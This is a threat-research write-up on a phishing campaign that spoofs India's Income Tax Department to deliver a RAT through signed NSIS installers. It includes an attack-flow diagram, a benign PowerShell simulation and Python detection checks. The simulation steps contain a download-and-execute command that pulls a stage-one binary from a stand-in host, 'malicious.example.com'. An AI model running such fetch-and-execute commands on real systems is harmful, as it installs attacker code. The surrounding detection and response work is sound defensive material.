SOC Prime Bias: Medium

30 Dec 2025 16:29

Phishing Campaign Spoofs India’s Income Tax to Target Businesses

Ruslan Mikhalov, Chief of Threat Research at SOC Prime

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

A phishing operation spoofing the Indian Income Tax Department delivers a booby-trapped PDF that funnels recipients to a counterfeit compliance portal. The site prompts victims to download a ZIP package containing a signed NSIS installer, which then deploys a multi-stage Remote Access Trojan. The RAT persists by creating a Windows service and talks to multiple C2 servers over non-standard ports.

Investigation

Researchers analyzed the PDF lure, the embedded URL, and the chained NSIS installer workflow. They documented the binaries dropped to disk, the creation of a concealed installation folder, and the registration of NSecRTS.exe as a Windows service. The write-up also captured outbound communications to three IP addresses and highlighted the use of signed payloads throughout the delivery chain.

Mitigation

Block the malicious domain and related IP addresses at the perimeter and through proxy controls. Strengthen email protections to flag tax-themed attachments and links leading to lookalike compliance portals. Prevent automatic execution of untrusted installers where possible, and monitor for suspicious service creation—especially anything named “Windows Real-time Protection Service.”

Response

Alert on the listed filenames, hashes, and Windows service registration activity tied to the infection chain. Isolate impacted endpoints, acquire memory and disk images, and run a full forensic sweep to identify any additional RAT stages or tooling. Remove persistence artifacts and reset potentially exposed credentials to prevent re-entry.

Attack Flow

    graph TB
      %% Class definitions
      classDef action fill:#99ccff
      classDef tool fill:#cccccc
      classDef malware fill:#ffcc99
      classDef file fill:#e6e6e6

      %% Nodes - Actions (MITRE Techniques)
      action_phishing_attachment["<b>Action</b> – T1566.001: <b>Spearphishing Attachment</b><br/>Email with malicious PDF “Review Annexure.pdf” delivered to victim."]
      class action_phishing_attachment action
      action_phishing_link["<b>Action</b> – T1566.002: <b>Spearphishing Link</b><br/>PDF contains link to fake Income Tax portal (hxxps://www.akjys.top/)."]
      class action_phishing_link action
      action_user_execution["<b>Action</b> – T1204.002: <b>User Execution</b><br/>Victim clicks link, zip file auto-downloads and installer is run."]
      class action_user_execution action
      action_code_signing["<b>Action</b> – T1553.002: <b>Code Signing</b><br/>NSIS installers signed with legitimate-looking certificates."]
      class action_code_signing action
      action_signed_binary_proxy["<b>Action</b> – T1218: <b>Signed Binary Proxy Execution</b><br/>Signed NSIS installer launches malicious payload, bypassing controls."]
      class action_signed_binary_proxy action
      action_obfuscation["<b>Action</b> – T1027.002: <b>Software Packing</b><br/>Multi-stage NSIS wrappers encrypt and hide malicious binaries."]
      class action_obfuscation action
      action_persistence_service_perm["<b>Action</b> – T1574.010: <b>Services File Permissions Weakness</b><br/>Installer modifies service file permissions."]
      class action_persistence_service_perm action
      action_persistence_service["<b>Action</b> – T1569.002: <b>Service Execution</b><br/>Registers NSecRTS.exe as Windows service “Windows Real-time Protection Service”."]
      class action_persistence_service action
      action_discovery_system["<b>Action</b> – T1082: <b>System Information Discovery</b><br/>RAT collects OS version, hardware details."]
      class action_discovery_system action
      action_discovery_software["<b>Action</b> – T1518: <b>Software Discovery</b><br/>RAT enumerates installed applications and services, stores data in C:\Program Files\Common Files\NSEC\Data."]
      class action_discovery_software action
      action_c2_web["<b>Action</b> – T1071.001: <b>Web Protocols</b><br/>C2 communication over HTTP/HTTPS."]
      class action_c2_web action
      action_c2_nonstandard["<b>Action</b> – T1571: <b>Non-Standard Port</b><br/>Uses ports 48991, 48992, 3898 for C2 traffic."]
      class action_c2_nonstandard action
      action_c2_bidirectional["<b>Action</b> – T1102.002: <b>Bidirectional Web Service</b><br/>Enables two-way communication with server."]
      class action_c2_bidirectional action
      action_remote_access["<b>Action</b> – T1219: <b>Remote Access Tools</b><br/>Attacker executes commands, exfiltrates data, maintains control."]
      class action_remote_access action
      action_exfiltration_scheduled["<b>Action</b> – T1029: <b>Scheduled Transfer</b><br/>Harvested data periodically POSTed to C2 server."]
      class action_exfiltration_scheduled action
      action_defense_evasion["<b>Action</b> – T1070.004: <b>File Deletion</b><br/>Loader removes dropped files and temporary folders after execution."]
      class action_defense_evasion action
      action_multi_stage["<b>Action</b> – T1104: <b>Multi-Stage Channels</b><br/>Successive installers deliver final RAT payload."]
      class action_multi_stage action

      %% Nodes - Tools / Files / Malware
      tool_nsis_installer["<b>Tool</b> – <b>Name</b>: NSIS Installer<br/><b>Description</b>: Signed installer used to bootstrap payload."]
      class tool_nsis_installer tool
      malware_rat["<b>Malware</b> – <b>Name</b>: NSEC RAT<br/><b>Description</b>: Remote access trojan providing full system control."]
      class malware_rat malware
      file_pdf["<b>File</b> – <b>Name</b>: Review Annexure.pdf<br/><b>Type</b>: Malicious PDF attachment."]
      class file_pdf file
      file_zip["<b>File</b> – <b>Name</b>: Review Annexure.zip<br/><b>Type</b>: Archive containing NSIS installer."]
      class file_zip file
      file_exe["<b>File</b> – <b>Name</b>: NSecRTS.exe<br/><b>Type</b>: Service executable registered with Windows."]
      class file_exe file

      %% Connections - Attack Flow
      action_phishing_attachment -->|contains| file_pdf
      file_pdf -->|links to| action_phishing_link
      action_phishing_link -->|leads to| file_zip
      file_zip -->|executed by| action_user_execution
      action_user_execution -->|uses| tool_nsis_installer
      tool_nsis_installer -->|signed with| action_code_signing
      action_code_signing -->|enables| action_signed_binary_proxy
      action_signed_binary_proxy -->|obfuscates via| action_obfuscation
      action_obfuscation -->|creates| malware_rat
      malware_rat -->|installed as| action_persistence_service_perm
      action_persistence_service_perm -->|enables| action_persistence_service
      action_persistence_service -->|executes| file_exe
      file_exe -->|collects via| action_discovery_system
      file_exe -->|collects via| action_discovery_software
      action_discovery_system -->|sends data to| action_c2_web
      action_discovery_software -->|sends data to| action_c2_web
      action_c2_web -->|uses ports| action_c2_nonstandard
      action_c2_web -->|uses channel| action_c2_bidirectional
      action_c2_bidirectional -->|provides| action_remote_access
      action_remote_access -->|performs| action_exfiltration_scheduled
      action_exfiltration_scheduled -->|triggers| action_defense_evasion
      action_defense_evasion -->|precedes| action_multi_stage

      %% Styling (mermaid class lists take no spaces after commas and no wildcards)
      class tool_nsis_installer tool
      class file_pdf,file_zip,file_exe file
      class malware_rat malware
      class action_phishing_attachment,action_phishing_link,action_user_execution,action_code_signing,action_signed_binary_proxy,action_obfuscation,action_persistence_service_perm,action_persistence_service,action_discovery_system,action_discovery_software,action_c2_web,action_c2_nonstandard,action_c2_bidirectional,action_remote_access,action_exfiltration_scheduled,action_defense_evasion,action_multi_stage action

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:
    An adversary delivers a phishing email titled “Income Tax Notice”. The attachment is a malicious Word document that drops setup_Ir5swQ3EpeuBpePEpew=.exe to %TEMP%. The victim executes the file, which in turn spawns Sibuia.exe (the true payload) as its child. This parent‑child chain is designed to bypass generic process‑creation alerts but is caught by the Sigma rule.

    Steps performed on the compromised host:

    1. Drop the first-stage binary:
      $stage1 = "$env:TEMP\setup_Ir5swQ3EpeuBpePEpew=.exe"
      Invoke-WebRequest -Uri "http://malicious.example.com/stage1" -OutFile $stage1
    2. Execute the first-stage binary:
      Start-Process -FilePath $stage1 -NoNewWindow
    3. The first-stage binary internally creates the second-stage binary Sibuia.exe in the same directory and launches it (simulated by the regression test script below).
  • Regression Test Script:
    The script below reproduces the exact parent‑child relationship required to fire the rule.

    # -------------------------------------------------
    # Simulation of Indian Income-Tax phishing chain
    # -------------------------------------------------
    # Define paths (the path separator after $env:TEMP is required)
    $stage1 = "$env:TEMP\setup_Ir5swQ3EpeuBpePEpew=.exe"
    $stage2 = "$env:TEMP\Sibuia.exe"

    # Create placeholder binaries as copies of cmd.exe: a text file named .exe
    # cannot be started, whereas a renamed cmd.exe runs and is logged under the
    # expected image name (Sysmon Event ID 1 / Security 4688)
    Copy-Item -Path "$env:SystemRoot\System32\cmd.exe" -Destination $stage1 -Force
    Copy-Item -Path "$env:SystemRoot\System32\cmd.exe" -Destination $stage2 -Force

    Write-Host "[*] Launching stage1, which spawns stage2 (Sibuia.exe) as its child..."
    # Start-Process has no -Parent parameter; the parent-child relationship is
    # genuine because stage1 itself launches stage2 (which idles 5 s, then exits)
    $proc1 = Start-Process -FilePath $stage1 -ArgumentList "/c `"$stage2`" /c timeout /t 5" -PassThru

    # Wait for the chain to finish so the cleanup step does not race it
    Wait-Process -Id $proc1.Id -Timeout 30 -ErrorAction SilentlyContinue

    Write-Host "[+] Simulation complete. Verify detection in SIEM."
    # -------------------------------------------------
  • Cleanup Commands:
    Remove the artifacts and terminate any lingering processes.

    # Stop any leftover processes
    Get-Process -Name "setup_Ir5swQ3EpeuBpePEpew=" -ErrorAction SilentlyContinue | Stop-Process -Force
    Get-Process -Name "Sibuia" -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Delete files
    Remove-Item -Path "$env:TEMP\setup_Ir5swQ3EpeuBpePEpew=.exe" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMP\Sibuia.exe" -Force -ErrorAction SilentlyContinue
    
    Write-Host "[*] Cleanup complete."
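As an added example (not SOC Prime's rule or code), the following Python runs the host-side detections the Mitigation and Response sections call for, plus the parent-child chain the regression test above reproduces, over constructed Windows event records; the NSEC install path, the destination IP and the sample records are assumptions, not captured telemetry.

```python
"""Host-artifact detections for the campaign, run over constructed Windows event records."""

# Indicators from the write-up: service name and binary, C2 ports, stage filenames
SERVICE_NAME = "windows real-time protection service"
SERVICE_IMAGE = "nsecrts.exe"
C2_PORTS = {48991, 48992, 3898}
STAGE1, STAGE2 = "setup_ir5swq3epeubpepepew=.exe", "sibuia.exe"


def image_name(path):
    """Lower-cased final component of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return an alert string for one event, or None. Fields follow the System-log 7045 and
    Sysmon 1/3 XML attributes; assumption: the collector flattened each record into a dict."""
    eid = event["EventID"]
    if eid == 7045:  # System log: new service installed (the RAT's persistence)
        if (event.get("ServiceName", "").lower() == SERVICE_NAME
                or image_name(event.get("ImagePath", "")) == SERVICE_IMAGE):
            return f"service-persistence: {event['ServiceName']} -> {event['ImagePath']}"
    elif eid == 1:  # Sysmon: process creation, the parent-child chain the regression test reproduces
        if (image_name(event.get("ParentImage", "")) == STAGE1
                and image_name(event.get("Image", "")) == STAGE2):
            return f"stage-chain: {event['ParentImage']} spawned {event['Image']}"
    elif eid == 3:  # Sysmon: outbound connection from the service binary on a listed port
        if (image_name(event.get("Image", "")) == SERVICE_IMAGE and event.get("Initiated") == "true"
                and int(event.get("DestinationPort", 0)) in C2_PORTS):
            return f"c2-port: {event['Image']} -> {event['DestinationIp']}:{event['DestinationPort']}"
    return None


# Constructed sample records; the NSEC path and the IP are assumptions, not captured telemetry
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "Windows Real-time Protection Service",
     "ImagePath": r"C:\Program Files\Common Files\NSEC\NSecRTS.exe"},
    {"EventID": 7045, "ServiceName": "Spooler", "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
    {"EventID": 1, "Image": r"C:\Users\victim\AppData\Local\Temp\Sibuia.exe",
     "ParentImage": r"C:\Users\victim\AppData\Local\Temp\setup_Ir5swQ3EpeuBpePEpew=.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 3, "Image": r"C:\Program Files\Common Files\NSEC\NSecRTS.exe", "Initiated": "true",
     "DestinationIp": "203.0.113.10", "DestinationPort": "48991"},
    {"EventID": 3, "Image": r"C:\Program Files\Common Files\NSEC\NSecRTS.exe", "Initiated": "true",
     "DestinationIp": "203.0.113.10", "DestinationPort": "443"},
]


def run(events=SAMPLE_EVENTS):
    """Evaluate every event and return the alerts that fired, in order."""
    return [alert for alert in map(evaluate, events) if alert]
```

The three benign records (the Spooler service, notepad under explorer, and the port-443 connection) are there to show the checks do not fire on ordinary activity.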